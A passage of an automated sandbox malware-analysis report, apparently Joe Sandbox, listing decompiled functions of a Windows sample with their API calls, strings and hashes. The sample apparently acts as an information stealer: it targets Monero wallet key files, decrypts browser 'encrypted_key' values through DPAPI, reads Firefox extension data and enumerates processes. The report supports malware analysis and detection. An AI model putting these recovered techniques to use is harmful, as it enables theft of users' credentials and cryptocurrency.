                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: cfdcbb10ac53431cd15196d4436256acb5f3da394ab17f6db91687a0beb14046
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: A751AE72561307AFEB358F54C985BBA77A4FF15300F24412DE805469D2E7B1EDA0DB90
                                    Function 0019A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0019A664
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: a1a05d5cc813c481ab2338673367d31000f829717da8198ce291d55c9c6d60d2
                                    • Instruction ID: 3d94695ee7ae5f58444a4f01e1fba4a997eb1ced1fb51befa6e2adb1bf01af61
                                    • Opcode Fuzzy Hash: a1a05d5cc813c481ab2338673367d31000f829717da8198ce291d55c9c6d60d2
                                    • Instruction Fuzzy Hash: 12517074A40208EFDF18EFA4CD96FED77B5AF55304F808118F90A5B291EB706A45CB92
                                    Function 0019F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001B1678,001B0D93), ref: 0019F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0019F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 73c60069c2fdaea5a95f44c88cf13c402d5e810d14e8e3da603b203927dc520a
                                    • Instruction ID: 95aaf3752b1e952452cccbde10d5bbb2e2ea2b20ebdfc26440b32c4133c55a13
                                    • Opcode Fuzzy Hash: 73c60069c2fdaea5a95f44c88cf13c402d5e810d14e8e3da603b203927dc520a
                                    • Instruction Fuzzy Hash: F451EF7AD10208ABCB44FBE4DDA6DFD7379AF65300F808568F51667191EF346A08CB62
                                    Function 001A37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: f8f5fb8b37e38ee6213a1b330811af0e50ef0c644a44bed56d48493195e93c90
                                    • Instruction ID: 8fcbdf72b6a37b628825643b1c9db3e7a0f3c85ff787302dc88795fb9fb8fbe8
                                    • Opcode Fuzzy Hash: f8f5fb8b37e38ee6213a1b330811af0e50ef0c644a44bed56d48493195e93c90
                                    • Instruction Fuzzy Hash: AC411C75E002099BCB04EFE4D855BEEB778AF59304F40851CF52677290EB74AA45CFA2
                                    Function 0019A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0019A489
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                      • Part of subcall function 0019A210: LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                      • Part of subcall function 0019A210: LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                      • Part of subcall function 0019A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0019A2D4
                                      • Part of subcall function 0019A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0019A2F3
                                      • Part of subcall function 0019A2B0: LocalFree.KERNEL32(?), ref: 0019A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 27d1b811f52316cd7fe8f1dfe9797c2721b16e13ecc913db281916ce9ee1a664
                                    • Instruction ID: 1a36432a67f84f724de97996b5843fa853bbb2598037d3334cdae7a64daef28c
                                    • Opcode Fuzzy Hash: 27d1b811f52316cd7fe8f1dfe9797c2721b16e13ecc913db281916ce9ee1a664
                                    • Instruction Fuzzy Hash: 5A3154B6E00109ABDF04DFE4DC55AEFB7B8BF58304F844518E901A3241EB309E08CBA2
                                    Function 001A8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B05BF), ref: 001A885A
                                    • Process32First.KERNEL32(?,00000128), ref: 001A886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 001A8883
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • CloseHandle.KERNEL32(?), ref: 001A88F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: fe1ad9825c6c7bae84974141e1a1c252e5c4e86f5f2c7e0d605c0b09a7b733a7
                                    • Instruction ID: f668be42ac62aed7e5bbb71277c5a7b9e24751ff7349d3bb135235f95ebb7999
                                    • Opcode Fuzzy Hash: fe1ad9825c6c7bae84974141e1a1c252e5c4e86f5f2c7e0d605c0b09a7b733a7
                                    • Instruction Fuzzy Hash: C0316B75901218ABCB64EF94CD51FEEB778EF56700F5041A9F10AA22A0EF306A44CFA1
                                    Function 0020FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0020FE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0020FE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: a24a7510afb250591cd9479774e24f1fe5858a73b493f1a5ee0ee570056c8959
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: B7012432569722EEF7742A749DC99A73684EB157B07304339F712805F3EFA14CB19540
                                    Function 001A9470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(001A3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,001A3D3E,?), ref: 001A948C
                                    • GetFileSizeEx.KERNEL32(000000FF,001A3D3E), ref: 001A94A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 001A94B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 3f2532baf05e4b7618e5935238d553e3be5b60cec3a63832e74bfa62b4a69a6f
                                    • Instruction ID: a6a59a7dd2daa86deff8f2827517f62509069cb8b3abc04cf920b8d6944e781b
                                    • Opcode Fuzzy Hash: 3f2532baf05e4b7618e5935238d553e3be5b60cec3a63832e74bfa62b4a69a6f
                                    • Instruction Fuzzy Hash: FBF0AF38E04208BBDB10DFB0EC48F9E77B9AB49314F10C264FA11A7280EBB096418B84
                                    Function 001ACA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 001ACA7E
                                      • Part of subcall function 001AC2A0: __amsg_exit.LIBCMT ref: 001AC2B0
                                    • __getptd.LIBCMT ref: 001ACA95
                                    • __amsg_exit.LIBCMT ref: 001ACAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 001ACAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: e8976f1c3bfe9063183b6551b45ed454729651119d8dffecd42ed95e9a1613ca
                                    • Instruction ID: a93c3ebe30bb9dd6fff3ab73c07debeda30fb7f64eec6c22bea763fde59840a4
                                    • Opcode Fuzzy Hash: e8976f1c3bfe9063183b6551b45ed454729651119d8dffecd42ed95e9a1613ca
                                    • Instruction Fuzzy Hash: EDF0B43A9487189BD721FBB898437AE33A0AF52720F11414BF404A72D3EB645D808BD5
                                    Function 002104D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
